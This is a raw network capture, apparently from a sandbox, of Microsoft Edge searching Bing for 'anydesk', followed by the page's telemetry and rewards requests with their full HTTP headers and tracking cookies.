https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; SRCHHPGUSR=SRCHLANG=en&HV=1728144351&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o

Response

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
Content-Encoding: br
Expires: Sat, 05 Oct 2024 16:06:40 GMT
Vary: Accept-Encoding
X-EventID: 6701644ca2134b4182a14aeef80f0808
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ZcmybaArjxhfaNokxWgKGLSh6XNOZS1HKbZbdD9vTTs='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
Report-To: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
Cross-Origin-Embedder-Policy-Report-Only: 'require-corp; report-to=\"crossorigin-errors\"'
Cross-Origin-Opener-Policy-Report-Only: 'same-origin; report-to=\"crossorigin-errors\"'
Date: Sat, 05 Oct 2024 16:07:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; domain=.bing.com; path=/; secure; SameSite=None
Set-Cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144460.185247d1
Set-Cookie: bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; Domain=.bing.com; Path=/; Expires=Sat, 05 Oct 2024 18:05:49 GMT; Max-Age=7089; Secure
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144461.18525b32
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:213,%22BC%22:213,%22SE%22:-1,%22TC%22:-1,%22H%22:278,%22BP%22:492,%22CT%22:496,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,1890,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:213,%22BC%22:213,%22SE%22:-1,%22TC%22:-1,%22H%22:278,%22BP%22:492,%22CT%22:496,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,1890,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144461.185263b0
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%226.3%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144461080%2C%22Name%22%3A1262%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461082%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461084%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22200%22%2C%22Downlink%22%3A%226.3%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144460931%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1728144461080%2C%22Name%22%3A1262%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461082%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144461084%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=2043&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144461.18526546
POST

https://www.bing.com/rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=4B36F2F1B3E84114BE48F204E3D5D175

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /rewardsapp/ncheader?ver=50184609&IID=SERP.5051&IG=4B36F2F1B3E84114BE48F204E3D5D175 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 4
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-type: application/x-www-form-urlencoded
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: _C_Auth=; MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 840
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Expires: -1
Pragma: no-cache
Vary: Accept-Encoding
X-EventID: 6701644e6e55415ebd1228b9463d5276
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-vwrP/Fgbm+xAsK7sKZxzt7DhM80kQ7bgR3lnBs76jYk='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
X-Ceto-ref: 6701644e6e55415ebd1228b9463d5276|AFD:6701644e6e55415ebd1228b9463d5276|2024-10-05T16:07:42.643Z
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Set-Cookie: _C_ETH=1; domain=.bing.com; path=/; secure; httponly
